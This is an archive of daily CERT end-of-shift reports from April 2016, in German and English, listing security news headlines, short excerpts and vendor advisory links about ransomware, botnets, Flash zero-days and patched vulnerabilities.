possible link with Chimera *** --------------------------------------------- Rokku is yet another ransomware, discovered in recent weeks. Currently, it's most common distribution method is spam where a malicious executable is dropped by a VB script attached to an e-mail. The building blocks .. --------------------------------------------- https://blog.malwarebytes.org/threat-analysis/2016/04/rokku-ransomware/ *** Ramdo click-fraud malware uses evasive maneuvers to draw first blood from researchers *** --------------------------------------------- A thorough dissection of the click-fraud malware Ramdo shows a constantly evolving threat whose capabilities now include traffic encryption, random domain generation and improved virtualization detection. --------------------------------------------- http://www.scmagazine.com/ramdo-click-fraud-malware-uses-evasive-maneuvers-… *** Websites take control of USB devices: Googlers propose WebUSB API *** --------------------------------------------- What could possibly go wrong? Wait, what could possibly go right Two Google engineers have drafted a .. --------------------------------------------- www.theregister.co.uk/2016/04/11/google_posts_usb_devices_tool/ *** Half of people plug in USB drives they find in the parking lot *** --------------------------------------------- Why do we even bother with security software? A new study has found that almost half the people who pick up a USB stick they happen across in a parking lot plug said drives into their PCs. --------------------------------------------- www.theregister.co.uk/2016/04/11/half_plug_in_found_drives/ *** DSA-3547 imagemagick - security update *** --------------------------------------------- Several vulnerabilities were discovered in Imagemagick, a program suite forimage manipulation. This update fixes a large number of potential securityproblems such as null-pointer access and buffer-overflows that might leadto memory leaks or denial of service. None of these security problems havea CVE number assigned. --------------------------------------------- https://www.debian.org/security/2016/dsa-3547 *** Atmos, the Citadel Trojan successor is in the wild *** --------------------------------------------- Security experts from the Heimdal Security firm are issuing an alert on the Atmos malware which is the successor of the dreaded Citadel Trojan. Months ago, the author of the dreaded Citadel malware was sentenced to prison, but in .. --------------------------------------------- http://securityaffairs.co/wordpress/46252/malware/atmos-trojan.html *** TYPO3 CMS 6.2.20, 7.6.5 and 8.0.1 released *** --------------------------------------------- https://typo3.org/news/article/typo3-cms-6220-765-and-801-released/ *** Snort Lab: Payload Detection Rules (PCRE) *** --------------------------------------------- Until now, when we used Snort to look for certain content within the payload, we've always looked for some specific values. What if we wanted to look for something that we .. --------------------------------------------- http://resources.infosecinstitute.com/snort-lab-payload-detection-rules-pcr… *** Kernel: Oracle startet eigene Sammlung von Linux-Sicherheitspatches *** --------------------------------------------- Um Updates leichter einspielen zu können, will Oracle Zweige des Linux-Kernel pflegen, die ausschließlich Patches für Sicherheitslücken enthalten. Was gut klingt, ist aber eine kontroverse Idee, da die Auswirkungen von Kernel-Fehlern schwer zu beurteilen sind. --------------------------------------------- http://www.golem.de/news/kernel-oracle-startet-eigene-sammlung-von-linux-si…

1 0

Tageszusammenfassung - Montag 11-04-2016
by Daily end-of-shift report 11 Apr '16

11 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 08-04-2016 18:00 − Montag 11-04-2016 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** Mumblehard takedown ends army of Linux servers from spamming *** --------------------------------------------- One year after the release of the technical analysis of the Mumblehard Linux botnet, we are pleased to report that it is no longer active. ESET, in cooperation with the Cyber Police of Ukraine and CyS Centrum LLC, have taken down the Mumblehard botnet, stopping all its spamming activities since February 29th, 2016. --------------------------------------------- http://www.welivesecurity.com/2016/04/07/mumblehard-takedown-ends-army-of-l… *** Improvements to Safe Browsing Alerts for Network Administrators *** --------------------------------------------- [...] Today, to provide Network Admins with even more useful information for protecting their users, we're adding URLs related to Unwanted Software, Malicious Software, and Social Engineering to the set of information we share. Here's the full set of data we share with network administrators:[...] --------------------------------------------- https://security.googleblog.com/2016/04/improvements-to-safe-browsing-alert… *** Ransomware: Locky, TeslaCrypt, Other Malware Families Use New Tool To Evade Detection *** --------------------------------------------- Today we identified a new tool actively being used by the Locky ransomware family to evade detection and potentially infect endpoints. Unit 42 identified slight changes in Locky detonations through the AutoFocus threat intelligence service,... --------------------------------------------- http://researchcenter.paloaltonetworks.com/2016/04/unit42-ransomware-locky-… *** FBI: $2.3 Billion Lost to CEO Email Scams *** --------------------------------------------- The U.S. Federal Bureau of Investigation (FBI) this week warned about a "dramatic" increase in so-called "CEO fraud," e-mail scams in which the attacker spoofs a message from the boss and tricks someone at the organization into wiring funds to the fraudsters. The FBI estimates that these scams have cost organizations more than $2.3 billion in losses over the past three years. --------------------------------------------- http://krebsonsecurity.com/2016/04/fbi-2-3-billion-lost-to-ceo-email-scams/ *** If only hackers could stop slurping test and dev databases. Wait, our phone is ringing ... *** --------------------------------------------- Delphix thinks it has a solution Exposure and loss of sensitive data is happening everywhere these days. One attack surface, as the jargon has it, is sensitive production data used in internal testing and development systems. --------------------------------------------- http://www.theregister.co.uk/2016/04/08/delphix_data_breach_prevention/ *** Hikvision Digital Video Recorder Cross-Site Request Forgery *** --------------------------------------------- The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. --------------------------------------------- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5315.php *** The Open-source vulnerabilities database (OSVDB) shuts down permanently *** --------------------------------------------- The Open Sourced Vulnerability Database (OSVDB) shut down permanently in response to the lack of assistance from the industry. The Open Sourced Vulnerability Database (OSVDB) shut down permanently, the news was reported in a blog post published by the maintainers of the project. The decision was made in response to the lack of assistance from the industry. --------------------------------------------- http://securityaffairs.co/wordpress/46129/security/osvdb-shuts-down.html *** Windows XP ist nicht totzukriegen: 11 Prozent Marktanteil *** --------------------------------------------- 15 Jahre nach der Veröffentlichung und zwei Jahre nach Support-Ende durch Microsoft ist Windows XP weiterhin das dritthäufigste Betriebssystem im Desktop-Bereich. --------------------------------------------- http://futurezone.at/produkte/windows-xp-ist-nicht-totzukriegen-11-prozent-… *** Hacker-Angriff auf DuMont Mediengruppe: Zeitungsportale betroffen *** --------------------------------------------- Systeme aus Sicherheitsgründen abgeschaltet --------------------------------------------- http://derstandard.at/2000034558622 *** Moxa NPort Device Vulnerabilities *** --------------------------------------------- NCCIC/ICS-CERT is aware of a public report of vulnerabilities affecting Moxa NPort 6110, 5100 series, and 6000 series devices. The Moxa NPort 6110 device is a Modbus/TCP to serial communication gateway. Moxa NPort 5100 series and 6000 series devices are serial-to-Ethernet converters. --------------------------------------------- https://ics-cert.us-cert.gov/alerts/ICS-ALERT-16-099-01 *** Learning from Bait and Switch Mobile Ransomware *** --------------------------------------------- Porn and mobile malware; two things that can illicit the response "I didn't know how it got there" when someone finds them. We have recently caught sight of a mobile ransomware distributed by fake adult websites. However, much like a lot of things in the adult industry, this malware doesn't seem very logical.This piece showcases an incident that can help users understand mobile threats and aims to boost user awareness to these threats. We believe that securing knowledge --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/learning-from-ba… *** Mindless Flash masses saved as exploit kit devs go astray with 0day *** --------------------------------------------- Since-patched flaw was imperfectly targeted by incompetent crimeware Malwarebytes hacker Jerome Segura says black hats have made a mess of efforts to unleash an Adobe Flash zero day vulnerability as part of their popular exploit kit, reducing the pool of potential victims. --------------------------------------------- http://www.theregister.co.uk/2016/04/11/mindless_flash_masses_saved_as_magn… *** Vista: Das letzte Jahr für die viel gehasste Windows-Version *** --------------------------------------------- Am 11. April 2017 wird der Support eingestellt - Baldiges Update empfohlen --------------------------------------------- http://derstandard.at/2000034590249 *** New Threat Report *** --------------------------------------------- Our latest threat report (PDF) is now available. The report discusses trends from the most prevalent cybersecurity threats we've seen during the year 2015. The Chain of Compromise (CoC) model is also introduced along with exploit kits, ransomware and more. Get it and more from:f-secure.com/labs --------------------------------------------- https://labsblog.f-secure.com/2016/04/11/new-threat-report/ *** Erpressungs-Trojaner Petya geknackt, Passwort-Generator veröffentlicht *** --------------------------------------------- Ein kostenloses Tool soll das zum Entschlüsseln nötige Passwort innerhalb weniger Sekunden generieren können, verspricht der Macher des Werkzeugs. Erste Erfolgsberichte von Petya-Opfern liegen bereits vor. --------------------------------------------- http://heise.de/-3167064 *** Nuclear Drops Tor Runs and Hides *** --------------------------------------------- Yesterday we observed a new technique in the Nuclear kit and found a new payload and technique we've not seen before. --------------------------------------------- http://blog.talosintel.com/2016/04/nuclear-tor.html *** iMessage-Schwachstelle ermöglicht Zugriff auf alle Nachrichten im Klartext *** --------------------------------------------- Eine Sicherheitslücke in der Nachrichten-App erlaubt einem Angreifer, die Datenbank mit sämtlicher Kommunikation des Opfers auszulesen, sobald dieses einen zugesendeten Link anklickt. Apple hat die Schwachstelle in OS X 10.11.4 beseitigt. --------------------------------------------- http://www.heise.de/newsticker/meldung/iMessage-Schwachstelle-ermoeglicht-Z… *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Netezza Host Management (CVE-2016-2842) *** http://www.ibm.com/support/docview.wss?uid=swg21980927 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in RubyOnRails affects IBM BigFix Compliance Analytics. (CVE-2016-2097, CVE-2016-2098) *** http://www.ibm.com/support/docview.wss?uid=swg21979720 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in Samba affects IBM Spectrum Scale SMB protocol access method (CVE-2015-7560) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005727 --------------------------------------------- *** IBM Security Bulletin: Potential security vulnerability in IBM WebSphere Application Server if FIPS 140-2 is enabled (CVE-2016-0306) *** http://www.ibm.com/support/docview.wss?uid=swg21979231 --------------------------------------------- *** Multiple vulnerabilities in OpenSSL affect AIX CVE-2016-0800 CVE-2016-0799 CVE-2016-0798 CVE-2016-0797 CVE-2016-0705 CVE-2016-0702 *** http://www.ibm.com/support/ --------------------------------------------- *** IBM Security Bulletin: Cross-site scripting vulnerability in Liberty for Java for IBM Bluemix (CVE-2016-0283) *** http://www.ibm.com/support/docview.wss?uid=swg21980429 --------------------------------------------- *** IBM Security Bulletin: IBM InfoSphere Information Governance Catalog is vulnerable to XXE Injection Attack (CVE-2016-0250) *** http://www.ibm.com/support/docview.wss?uid=swg21977152 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSL affect Tivoli Provisioning Manager for OS Deployment and Tivoli Provisioning Manager for Images (CVE-2016-0701, CVE-2015-3197) *** http://www.ibm.com/support/docview.wss?uid=swg21979209 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in RubyOnRails affects IBM BigFix Compliance Analytics. (CVE-2015-7581, CVE-2016-0751, CVE-2016-0752, CVE-2016-0753) *** http://www.ibm.com/support/docview.wss?uid=swg21979514 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java SDK affects IBM Algorithmics Algo Risk Application and Counterparty Credit Risk (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21979757 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect IBM BigFix Compliance Analytics. (CVE-2015-7575, CVE-2016-0466) *** http://www.ibm.com/support/docview.wss?uid=swg21979412 --------------------------------------------- *** IBM Security Bulletin: Financial Transaction Manager for Corporate Payment Services Access Control: Information Disclosure - Dojo Readmes (CVE-2016-0232) *** http://www.ibm.com/support/docview.wss?uid=swg21977163 --------------------------------------------- *** IBM Security Bulletin: IBM DB2 LUW contains a denial of service vulnerability in which a malformated DRDA message may cause the DB2 server to terminate abnormally (CVE-2016-0211) *** http://www.ibm.com/support/docview.wss?uid=swg21979984 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in libxml2 affects IBM BigFix Compliance Analytics. (CVE-2015-8317) *** http://www.ibm.com/support/docview.wss?uid=swg21979515 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in libxml2 affects IBM BigFix Compliance Analytics. (CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500) *** http://www.ibm.com/support/docview.wss?uid=swg21979513 ---------------------------------------------

1 0

Tageszusammenfassung - Freitag 8-04-2016
by Daily end-of-shift report 08 Apr '16

08 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 07-04-2016 18:00 − Freitag 08-04-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Schweizer News-Site verbreitet Schadcode: Behörden und Firmen reagieren *** --------------------------------------------- Weil darüber offenbar gehäuft Schadcode verbreitet wird, haben nun die Schweizer Bundesverwaltung und mehrere große Unternehmen des Landes den Zugang ihrer Mitarbeiter zu einer der größten News-Sites des Landes gesperrt. --------------------------------------------- http://heise.de/-3165287 *** Security Features Nobody Implements, (Thu, Apr 7th) *** --------------------------------------------- Nobody may be wording it a bit strong. But adoption of these security features is certainly not taking off. If you can think of any features I forgot, then please comment: DNSSEC That is probably my favorite issue. DNSSEC fixes on of the most important protocols. Without it, spoofing is always possible, and in some cases not even terribly hard. I think there are a number of reasons it is not implemented: If you implement it, there is a good chance that you make your domain non-reachable if you... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20921&rss *** Open-source vulnerabilities database shuts down *** --------------------------------------------- An open-source project dedicated to cataloguing a huge range of computer security flaws has closed its doors as of Tuesday, according to an announcement on the Open-Source Vulnerability Database's blog.The OSVDB, which was founded in 2002, was meant to be an independent repository for security information, allowing researchers to compare notes without oversight from large corporate software companies.One of its founders was HD Moore, a well-known hacker and security researcher, best known... --------------------------------------------- http://www.cio.com/article/3053695/open-source-tools/open-source-vulnerabil… *** SBA Research @ Cyber-Physical Systems Week 2016 *** --------------------------------------------- We will participate in the events of CPS Week 2016 (Vienna, Austria, April 11-14, 2016). On Monday (April 11), Johanna Ullrich presents our work on "The Quest for Privacy in the Consumer Internet of Things" at the International Workshop on Consumers and the Internet of Things (ConsIoT 2016). A live webcast by the IoEtv will... --------------------------------------------- https://www.sba-research.org/2016/04/08/sba-research-cyber-physical-systems… *** Adobe fixes CVE-2016-1019 Zero-Day exploited to serve ransomware *** --------------------------------------------- Cyber criminals are exploiting the Flash player zero-day vulnerability (CVE-2016-1019) affecting Flash Player 21.0.0.197 and earlier disclosed by Adobe. Cyber criminals are already exploiting the Flash player zero-day vulnerability (CVE-2016-1019) affecting Flash Player 21.0.0.197 and earlier (CVE-2016-1019) disclosed by Adobe this week. Researchers at security firm Proofpoint confirmed that cyber gangs are exploiting it to distribute a ransomware dubbed Cerber. --------------------------------------------- http://securityaffairs.co/wordpress/46107/malware/adobe-fixes-cve-2016-1019… *** Breaking Semantic Image CAPTCHAs *** --------------------------------------------- Interesting research: Suphannee Sivakorn, Iasonas Polakis and Angelos D. Keromytis, "I Am Robot: (Deep) Learning to Break Semantic Image CAPTCHAs": Abstract: Since their inception, captchas have been widely used for preventing fraudsters from performing illicit actions. Nevertheless, economic incentives have resulted in an armsrace, where fraudsters develop automated solvers and, in turn, captcha services tweak their design to break the... --------------------------------------------- https://www.schneier.com/blog/archives/2016/04/breaking_semant.html *** Lemur Vehicle Monitors BlueDriver LSB2 does not authenticate users for Bluetooth access *** --------------------------------------------- The Lemur Vehicle Monitors BlueDriver is an aftermarket automotive device that connects to a vehicles OBD-II port and provides information about the vehicles performance. The BlueDriver does not require a PIN for Bluetooth access, which allows anyone in range to send arbitrary commands to the vehicles CAN bus. --------------------------------------------- https://www.kb.cert.org/vuls/id/615456 *** DSA-3545 cgit - security update *** --------------------------------------------- Several vulnerabilities were discovered in cgit, a fast web frontend forgit repositories written in C. A remote attacker can take advantage ofthese flaws to perform cross-site scripting, header injection or denialof service attacks. --------------------------------------------- https://www.debian.org/security/2016/dsa-3545 *** DSA-3544 python-django - security update *** --------------------------------------------- Several vulnerabilities were discovered in Django, a high-level Pythonweb development framework. The Common Vulnerabilities and Exposuresproject identifies the following problems: --------------------------------------------- https://www.debian.org/security/2016/dsa-3544 *** Cisco IP Interoperability and Collaboration System Cross-Site Scripting Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Symantec ITMS Inventory Solution Application Denial Functionality Bypass *** --------------------------------------------- http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se… *** Security Updates Available for Adobe Flash Player (APSB16-10) *** --------------------------------------------- A Security Bulletin (APSB16-10) has been published regarding security updates for Adobe Flash Player. These updates address critical vulnerabilities, and Adobe recommends users update their product installations to the latest versions using the instructions referenced in the security bulletin. Adobe... --------------------------------------------- https://blogs.adobe.com/psirt/?p=1334 *** SSA-751155 (Last Update 2016-04-08): Denial-of-Service Vulnerability in SCALANCE S613 *** --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-751155… *** SSA-623229 (Last Update 2016-04-08): DROWN Vulnerability in Industrial Products *** --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-623229… *** SSA-301706 (Last Update 2016-04-08): GNU C Library Vulnerability in Industrial Products *** --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-301706… *** IBM Security Bulletins *** --------------------------------------------- *** Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Flex System Chassis Management Module (CMM) *** http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099307 --------------------------------------------- *** Security Bulletin: Vulnerabilities in OpenSSH affect IBM Flex System Chassis Management Module (CVE-2016-0777, CVE-2016-0778) *** http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099309 --------------------------------------------- *** Security Bulletin: Vulnerabilities in NTP affect IBM Flex System FC3171 8Gb SAN Switch and SAN Pass-thru firmware, QLogic 8Gb Intelligent Pass-thru Module and SAN Switch Module and QLogic Virtual Fabric Extension Module *** http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099260 --------------------------------------------- *** Security Bulletin: Multiple vulnerabilities affect IBM Flex System Chassis Management Module *** http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099196 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM InfoSphere Master Data Management *** http://www.ibm.com/support/docview.wss?uid=swg21980207 --------------------------------------------- *** IBM Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server Liberty shipped with IBM Standards Processing Engine and IBM Transformation Extender Advanced (CVE-2015-1283) *** http://www.ibm.com/support/docview.wss?uid=swg21977266&myns=swgother&mynp=O… --------------------------------------------- *** IBM Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server Liberty shipped with IBM Standards Processing Engine and IBM Transformation Extender Advanced (CVE-2015-3183) *** http://www.ibm.com/support/docview.wss?uid=swg21977267&myns=swgother&mynp=O… ---------------------------------------------

1 0

Tageszusammenfassung - Donnerstag 7-04-2016
by Daily end-of-shift report 07 Apr '16

07 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 06-04-2016 18:00 − Donnerstag 07-04-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Trojaner infiziert 3,2 Millionen Android-Geräte *** --------------------------------------------- Über 100 Apps im offiziellen Google Play Store wurden mit einem Trojaner ausgeliefert. Millionen Android-User sind laut Sicherheitsforschern betroffen. --------------------------------------------- http://futurezone.at/digital-life/trojaner-im-google-play-store-infiziert-3… *** Phishing Email That Knows Your Address *** --------------------------------------------- An anonymous reader writes: BBC is reporting about a new type of phishing email that includes the recipients home address. The publication, citing sources, claims that thousands of people have already received such malicious emails. Clicking on the email apparently installs malware such as Cryptlocker ransomware on the recipients computing device. From the report, "Members of the BBC Radio 4s You and Yours team were among those who received the scam emails, claiming they owed hundreds of --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/7bIiICdWlco/phishing-email-… *** Cisco warns of critical risks from web bugs and insecure SSH keys *** --------------------------------------------- Fresh round of network security patches served Cisco has released a fresh crop of security advisories, including warnings for critical flaws in the UCS, Prime Infrastructure and Evolved Programmable Network Manager (EPNM) that would allow an attacker to gain root access over its products. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/04/06/cisco_warns… *** IETF-Tagung: Neue Vorschläge zum Sichern des Mailtransports *** --------------------------------------------- Mailserver hinken sicherheitsmäßig immer noch hinter Webservern her, wie ein TLS-Check der IHK Stuttgart jüngst verdeutlichte. Mailprovider haben sich nun zusammengetan, um bei der IETF mit "Strict Transport Security" voranzukommen. --------------------------------------------- http://heise.de/-3163818 *** Boffins boost IETF crypto efforts *** --------------------------------------------- Nice elliptic curves, now show us your hardware so we can do this to TLS A pair of German engineers want to give a push to the adoption of new crypto in the IETF by pushing the curves in RFC 7748 into hardware. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/04/07/boffins_boo… *** Remote code execution found and fixed in Apache OpenMeetings *** --------------------------------------------- Password token snatch might explain that unexpected weirdo in your next online meeting Recurity Labs hacker Andreas Lindh has found four vulnerabilities, including a remote code execution hole, in Apache OpenMeetings. The flaws mean attackers could hijack installations of the popular virtual meetings and shared whiteboard application. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/04/07/apache_open… *** Panama Papers: Die katastrophale IT-Sicherheitspraxis von Mossack Fonseca *** --------------------------------------------- Der Panama-Leaks-Firma Mossack Fonseca ist offenbar nicht nur das Steuerrecht herzlich egal - sondern auch die IT-Security. Kein TLS, Drown und uralte Versionen von Drupal und Outlook Web Access machen es Angreifern leicht. --------------------------------------------- http://www.golem.de/news/panama-papers-die-katastrophale-it-sicherheitsprax… *** Bypassing Phone Security through Social Engineering *** --------------------------------------------- This works: Khan was arrested in mid-July 2015. Undercover police officers posing as company managers arrived at his workplace and asked to check his driver and work records, according to the source. When they disputed where he was on a particular day, he got out his iPhone and showed them the record of his work. The undercover officers asked to... --------------------------------------------- https://www.schneier.com/blog/archives/2016/04/bypassing_phone.html *** Complete Tour of PE and ELF: Section Headers *** --------------------------------------------- In the previous part, we have discussed the ELF and Program Header. In this article, we will cover the remaining part i.e. section headers. We will also see what effect packers have on binaries headers. Below is the structure of Section Header Sh_name: Remember in ELF Header we talked about string table. sh_name is an... --------------------------------------------- http://resources.infosecinstitute.com/complete-tour-of-pe-and-elf-part-5/ *** Kärntner Unternehmen wurde Opfer eines Verschlüsselungs-Trojaners *** --------------------------------------------- Produktionsmaschine fiel in der Folge für einen Tag aus --------------------------------------------- http://derstandard.at/2000034398697 *** EUROCRYPT 2016 - supported by SBA Research *** --------------------------------------------- May 08, 2016 - May 12, 2016 - All Day Aula der Wissenschaften Wollzeile 27A Vienna --------------------------------------------- https://www.sba-research.org/events/eurocrypt-2016-supported-by-sba-researc… *** ECRYPT-CSA Workshop on Cryptographic protocols for small devices - supported by SBA Research *** --------------------------------------------- May 13, 2016 - All Day TU Wien Karlsplatz 13 1040 Wien --------------------------------------------- https://www.sba-research.org/events/ecrypt-csa-workshop-on-cryptographic-pr… *** UPDATED: Security Advisory posted for Adobe Flash Player (APSA16-01) *** --------------------------------------------- A Security Advisory (APSA16-01) has been published regarding a critical vulnerability (CVE-2016-1019) in Adobe Flash Player. UPDATE: Adobe is aware of reports that CVE-2016-1019 is being actively exploited on systems running *Windows 10 and earlier* with Flash Player... --------------------------------------------- https://blogs.adobe.com/psirt/?p=1330 *** Juniper Networks Completes ScreenOS Update *** --------------------------------------------- As we committed to in our January 8, 2016 blog, we have replaced the cryptographic algorithm in the latest release of ScreenOS 6.3. --------------------------------------------- https://forums.juniper.net/t5/Security-Incident-Response/Juniper-Networks-C… *** Bugtraq: CVE-2016-3672 - Unlimiting the stack not longer disables ASLR *** --------------------------------------------- http://www.securityfocus.com/archive/1/537996 *** DFN-CERT-2016-0567: McAfee Email Gateway: Eine Schwachstelle ermöglicht einen Cross-Site-Scripting-Angriff *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0567/ *** Panda Security URL Filtering Privilege Escalation *** --------------------------------------------- Topic: Panda Security URL Filtering Privilege Escalation Risk: Medium Text:* CVE: CVE-2015-7378 * Vendor: Panda Security * Reported by: Kyriakos Economou * Date of Release: 05/04/2016 * Affected Pro... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016040048 *** Panda Endpoint Administration Agent Privilege Escalation *** --------------------------------------------- Topic: Panda Endpoint Administration Agent Privilege Escalation Risk: Medium Text:* CVE: CVE-2016-3943 * Vendor: Panda Security * Reported by: Kyriakos Economou * Date of Release: 05/04/2016 * Affected Pro... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016040047 *** Security Advisory: Java vulnerabilities CVE-2016-0466 and CVE-2016-0483 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/50/sol50118123.html?… *** HP Security Bulletins *** --------------------------------------------- *** Bugtraq: [security bulletin] HPSBGN03569 rev.2 - HPE OneView for VMware vCenter (OV4VC), Remote Disclosure of Information *** http://www.securityfocus.com/archive/1/538003 --------------------------------------------- *** Bugtraq: [security bulletin] HPSBST03568 rev.1 - HP XP7 Command View Advanced Edition Suite including Device Manager and Hitachi Automation Director (HAD), Remote Server-Side Request Forgery (SSRF) *** http://www.securityfocus.com/archive/1/538005 --------------------------------------------- *** HPE Universal Configuration Management Database Unspecified Flaw Lets Remote Users Obtain Information and Perform Redirect Attacks *** http://www.securitytracker.com/id/1035505 --------------------------------------------- *** HPSBNS03571 rev.1 - HPE NonStop Virtual TapeServer (VTS), Remote Arbitrary Code Execution, Denial of Service (DoS), Unauthorized Information Disclosure *** https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05073516 --------------------------------------------- *** HPSBGN03570 rev.1 - HPE Universal CMDB, Remote Information Disclosure, URL Redirection *** https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05073504 --------------------------------------------- *** Cisco Security Advisories *** --------------------------------------------- *** Cisco Prime Infrastructure and Evolved Programmable Network Manager Privilege Escalation API Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco TelePresence Server Crafted IPv6 Packet Handling Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco TelePresence Server Malformed STUN Packet Processing Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco TelePresence Server Crafted URL Handling Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco UCS Invicta Default SSH Key Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSH affect IBM Pure Power Integration Manager (PPIM) (CVE-2016-0777, CVE-2016-0778) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023271 --------------------------------------------- *** IBM Security Bulletin: SLOTH - Weak MD5 Signature Hash vulnerability may affect DS8000 *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005735 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM OS Images for Red Hat Linux Systems, AIX, and Windows. (CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21980641 --------------------------------------------- *** IBM Security Bulletin:A vulnerability in IBM Java SDK affects IBM Image Construction and Composition Tool. (CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21980640 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM Workload Deployer. (CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21980638 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM MQ Internet Pass-Thru (CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21979712 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM PureApplication System. (CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21980639 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK 7 affect IBM Systems Director (CVE-2015-4872 CVE-2015-4840 CVE-2015-4903 ) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023588 --------------------------------------------- *** IBM Security Bulletin: IBM InfoSphere Master Data Management Collaborative Edition affected by Privilege Escalation security vulnerabilities (CVE-2015-7424) *** http://www.ibm.com/support/docview.wss?uid=swg21971542 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities have been identified in IBM Business Process Manager, and bundled products shipped with IBM Cloud Orchestrator and Cloud Orchestrator Enterprise *** http://www.ibm.com/support/docview.wss?uid=swg2C1000112 --------------------------------------------- *** IBM Security Bulletin: IBM TRIRIGA Application Platform Cross Site Scripting Vulnerability (CVE-2016-0344) *** http://www.ibm.com/support/docview.wss?uid=swg21980234 ---------------------------------------------

1 0

Tageszusammenfassung - Mittwoch 6-04-2016
by Daily end-of-shift report 06 Apr '16

06 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 05-04-2016 18:00 − Mittwoch 06-04-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Security Advisory posted for Adobe Flash Player (APSA16-01) *** --------------------------------------------- A Security Advisory (APSA16-01) has been published regarding a critical vulnerability (CVE-2016-1019) in Adobe Flash Player. Adobe is aware of reports that CVE-2016-1019 is being actively exploited on systems running Windows 7 and Windows XP with Flash Player version 20.0.0.306 and earlier. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1330 *** Security: Ungepatchte Flash-Lücke wird aktiv ausgenutzt *** --------------------------------------------- Es ist mal wieder Flash-Player-deinstallieren-Tag. Eine derzeit ungepatchte Sicherheitslücke wird aktiv ausgenutzt, immerhin existiert ein Workaround. Adobe will aber bald reagieren. --------------------------------------------- http://www.golem.de/news/security-ungepatchte-flash-luecke-wird-aktiv-ausge… *** Server software poses soft target for ransomware *** --------------------------------------------- An alternate method for infecting computers with ransomware signals a shift in tactics by cybercriminals that could put businesses at greater risk, according to Symantec.A type of 